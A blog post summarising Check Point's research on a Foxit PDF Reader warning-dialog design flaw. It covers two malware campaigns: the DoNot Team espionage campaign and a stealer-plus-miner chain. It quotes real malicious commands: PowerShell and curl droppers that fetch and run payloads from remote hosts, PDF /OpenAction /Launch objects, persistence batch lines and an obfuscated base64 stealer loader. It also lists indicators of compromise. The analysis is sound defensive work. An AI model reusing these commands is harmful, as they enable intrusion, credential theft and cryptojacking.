Flawed Design Attack on Foxit PDF Reader

Released By: Imène ALLOUCHE

Credits to: Checkpoint

I’ve been reading about the latest cyberattacks, and one in particular caught my eye: “Foxit PDF Reader Flawed Design Exploited to Deliver Malware Arsenal.”

Yes ! User Interface Spoofing and Deceptive Design Attacks are once again proving to be no easy vulnerabilities that shouldn’t be neglected.

A New Threat in Everyday Tools

I am more than sure that all everyone has used Portable Document Formats (PDFs) at least once in their lives (whether you have created one, downloaded one or read one) . They are a cornerstone of modern communication that offer a reliable way to share formatted content across various platforms.

However, recently, Check Point researchers have revealed a serious vulnerability in Foxit PDF Reader, a popular alternative to Adobe Acrobat Reader with over 700 million users worldwide.

This flaw exploits the design of Foxit’s security warnings, it tries to trick users into running malicious commands which leads to e-crime and espionage.

How Does the Attack Work

Imagine opening a PDF and being greeted by a security pop-up. You might expect a clear warning like “This file could harm your device.Do you want to open it?” But what if the message is trickier, with a pre-selected “Open Now” button that actually triggers malware?

This is the reality for millions of Foxit Reader users targeted by a cunning social engineering attack. Let’s break down the technical aspects and why it’s so sneaky.

The Design Flaw Idea Behind

The core of this attack lies in the design of Foxit Reader’s security warnings. Unlike a clear yes-or-no prompt, these warnings have a default “OK” button, which, in this case, is the most dangerous option.

Researchers discovered that after the initial “Trust this document?” pop-up (which should be clicked in most cases), a second one appears. This second pop-up, with “Open” pre-selected, is the real culprit. An unsuspecting user who clicks “OK” a second time without carefully reading the warning might unknowingly grant permission to execute malicious code.

First pop-up warning [ Credits to Checkpoint ]

Second malicious pop-up [Credits to Checkpoint ]

Technical Overview: Bypass Traditional Defenses

This attack bypasses traditional defenses in a clever way. Most antivirus and sandbox environments primarily focus on vulnerabilities in Adobe Reader, the dominant PDF reader. Since this exploit targets a design flaw specific to Foxit Reader, it can fly under the radar of these security solutions.

How ?

To understand the technical side, Checkpoint researchers attached a debugger (a tool used to analyze software behavior).

When the user clicks “OK” on the second pop-up, a malicious command is triggered. This command uses PowerShell, a built-in Windows scripting tool, to download a malicious file from a remote server and then execute it.

Debugger showing the command triggered [ Credits to Checkpoint ]

"C:\Windows\System32\cmd.exe" /c cD  %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs

If you are interested in the detailed explanation of the command triggered check my article : “Foxit Design Flaw Exploit-Technical Explanation of the malicious triggered command”

However for the sake of simplicity and clarity, here’s a simplified explanation of the malicious command:

• It creates a temporary file and navigates to that location.
• It downloads a file from a suspicious web address (indicated by “hxxps”) and saves it with the name “payload.exe”.
• It creates a batch file that waits a few seconds, starts “payload.exe” (the downloaded malware), and then deletes itself to avoid detection.
• Finally, it creates a script to execute the batch file and then deletes itself as well.

Once the “Ok” button has been clicked, the PDF metadata changes and if we analyze the PDF file statically, we can obtain the executed logic behind it:

.\pdf-parser.py .\mlw.pdf
PDF Comment '%PDF-1.1\r\n'
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R
  <<
    /OpenAction
      <<
        /S /Launch
        /Win
          <<
            /F (CMD)
            /P '(/c cD  %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\', \'payload.exe\')"'
          >>
        msd89h2j389uh.bat &@echo timeout
        / t 5
      >>
    msd89h2j389uh.bat &@echo start payload.exe
  >>
obj 2 0
 Type: /Pages
 Referencing: 3 0 R
  <<
    /Kids [ 3 0 R ]
    /Count 1
    /Type /Pages
  >>
obj 3 0
 Type: /Page
 Referencing: 5 0 R, 2 0 R, 4 0 R
  <<
    /Resources
      <<
        /Font
          <<
            /F1 5 0 R
          >>
      >>
    /MediaBox [ 0 0 795 842 ]
    /Parent 2 0 R
    /Contents 4 0 R
    /Type /Page
  >>
obj 4 0
 Type:
 Referencing:
 Contains stream
  <<
    /Length 1260
  >>
obj 5 0
 Type: /Font
 Referencing:
  <<
    /Subtype /Type1
    /Name /F1
    /BaseFont /Helvetica
    /Type /Font
  >>
xref
trailer
  <<
    /Size 6
    /Root 1 0 R
    /ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
  >>
startxref 1866
PDF Comment '%%EOF'

If you would like a detailed explanation of the static analysis of this PDF metadata, check my article : “Foxit Design Flaw Exploit-Technical Explanation of the malicious triggered command”

However, in order to keep it short and consistent, the most important thing to note in here is that the PDF points to an “OpenAction” that automatically runs a malicious program when opened in Foxit Reader due to a design flaw. This wouldn’t work in Adobe Reader by the way.

Diving Technically Deeper: A Case Study of Espionage

Checkpoint presented a lot of cases greatly detailed that I suggest you to check out, I will just provide a summary of some of them:

Case 01: Windows & Android Botnet Campaign:

Check Point researchers stumbled upon a malicious PDF named “Regarding Invitation to attend defence services Asia 2024 and National Security Asia 2024.pdf.” This deceptive title likely targeted individuals with an interest in these events. The PDF was likely distributed through a download link, not directly attached to emails.

The campaign relies on a straightforward attack chain. Once unsuspecting users download and open the PDF, it triggers a down loader script. This script silently downloads and executes two additional executable. These executable act as a two-pronged attack:

• Data Exfiltration: The first executable focuses on data theft. It gathers sensitive information like documents, images, and databases, essentially acting as a digital spy for the attackers. It stores this stolen data in a folder called “%Appdata%/htdocs/”.
• Android Expansion: The second executable hints at a broader campaign targeting not just Windows but also Android devices. It functions as a downloader for a known Android malware called Rafel RAT. This suggests the attackers aimed to compromise a wider range of devices beyond Windows machines.

Attack chain [credits to Checkpoint]

If you analyze the “bot registration” files, you will pinpoint the peak activity of the campaign on April 5th, 2024. Additionally, the attack methods and targeted information suggest the involvement of APT-C-35, also known as the DoNot Team. This group is notorious for launching sophisticated cyberattacks aimed at espionage.

Let’s go deeper into the technical aspects of this campaign:

• The script downloads two executable (“index.exe” and “upload.exe”):

“index.exe”: Steals various files (documents, images etc.) from specific locations on the infected machine and stores them in a hidden folder.

“upload.exe”: Uploads the stolen files to the attacker’s server.

The malware uses custom encryption for critical information (file paths, server addresses).
It has persistence mechanisms to ensure it runs on every system startup.
Evidence suggests the attackers might have additional tools for stealing data or taking screenshots.

The campaign targets information like documents and databases.
The attackers might have tools for compromising Android devices as well (based on server contents).

The APT-C-35 group (also known as DoNot Team) is suspected to be behind this campaign due to the attack methods and targeted information.

Case 02: Chained-Campaign — Stealer and Miner Delivery via PDF

This case involved a malicious PDF campaign that deployed a stealer and two cryptocurrency miners on infected machines.

attack chain [ credits to Checkpoint ]

1. The campaign used a PDF named “swift v2.pdf” to target Foxit PDF Reader users. It likely focused on users in the United States but affected others as well.
2. The PDF exploited a User Interface vulnerability through a pop-up to trigger a command execution.
3. The command downloaded a malicious BAT file named “mems.bat” to the “Public” folder.

    /OpenAction
      <<
        /S /Launch
        /Win
          <<
            /F '(c:\\\\windows\\\\system32\\\\cmd.exe)'
            /P '(/c curl hxxps://sealingshop.click/bat/bostar4 -o "C:\\\\Users\\\\Public\\\\mems.bat" & C:\\\\Users\\\\Public\\\\mems.bat)'
          >>
      >>

1. The BAT file opened a random website in the user’s browser, distracting them from the ongoing malicious activities.
2. The BAT file downloaded a second BAT file (“WindowsUpdate.bat”) to the Startup folder for persistence (meaning it would run automatically on system reboot).
3. It downloaded and installed Python 3.9 in the “Public” folder.
4. Finally, it downloaded a Python script named “documents.py”.
5. The “WindowsUpdate.bat” file used PowerShell to download and execute the “documents.py” script again on every reboot.

cmd /c start https://www.facebook.com/help/contact/1304188393453553?ref=payout_hub
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat"
cmd /c mkdir "C:\\Users\\Public\\python39"
cmd /c curl hxxps://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"
cmd /c tar -xf C:\\Users\\Public\\python39\\python39.zip -C "C:\\Users\\Public\\python39"
cmd /c curl hxxps://sealingshop.click/py/bostar4 -o "C:\\Users\\Public\\python39\\documents.py"
cmd /c C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"

• The “documents.py” script was a Python loader that retrieved and executed another obfuscated Python script.
• This second script functioned as an information stealer, targeting only Chrome and Edge browsers to steal credentials and cookies.
• It contacted a Command and Control (C&C) server to upload the stolen information.

import os
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import requests
import json
import getpass
import sys
vari = ''
exec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]]('dmFyaSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly9zZWFsaW5nc2hvcC5jbGljay9weWVuL2Jvc3RhcjQnKS50ZXh0')))
exec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]](vari)))

• The stealer script retrieved download URLs for two cryptocurrency miners: XMRig and Lol Miner.
• It used PowerShell commands to download, unzip, and execute both miners.
• The miners used the “PublicAlbums” and “PublicSounds” folders, respectively, to store their files.

os.system('cmd /c mkdir "C:\\Users\\Public\\PublicAlbums"')
os.system("powershell.exe -windowstyle hidden Invoke-WebRequest -URI " + url_miner_xmrig + " -OutFile C:\\Users\\Public\\PublicAlbums\\xmrig.zip")
os.system("powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\PublicAlbums\\xmrig.zip -DestinationPath C:\\Users\\Public\\PublicAlbums")
os.system("cmd /c C:\\Users\\Public\\PublicAlbums\\config.vbs")

• Both miners were downloaded from a malicious Gitlab repository : @topworld20241 and configured to connect to specific mining pools.

Indicators of Compromise (IoCs):

• Malicious PDF: “swift v2.pdf”
• C&C Server: Retrieving stolen information (URL not provided in the report)
• Miner Download URLs: (not provided in the report, but likely retrieved from the C&C server)
• Gitlab Repository: @topworld20241 (containing miner configuration files)
• File Paths:

“C:\Users\Public\mems.bat” (initial BAT script)

“C:\Users\Public\python39” (folder for Python installation)

“C:\Users\Public\python39\documents.py” (Python loader script)

“C:\Users\Public\PublicAlbums\xmrig.zip” (XMRig miner archive)

“C:\Users\Public\PublicAlbums\config.vbs” (XMRig miner configuration script)

“C:\Users\Public\PublicSounds\lolMiner.exe” (Lol Miner executable)

“C:\Users\Public\PublicSounds\lolMiner.vbs” (Lol Miner configuration script)

Final Word:

These two cases were the most intriguing for me. Check Point has documented many others, but I focused on understanding the script functionality and technical details of these specific campaigns. I’m impressed by the attackers’ sophistication in exploiting vulnerabilities for personal gain (cryptocurrency mining) rather than simply for amusement. The complex attack chains in these cases demonstrate the challenges of both exploitation and detection.

Resources and References

• Foxit PDF Flawed Design Exploitation By Checkpoint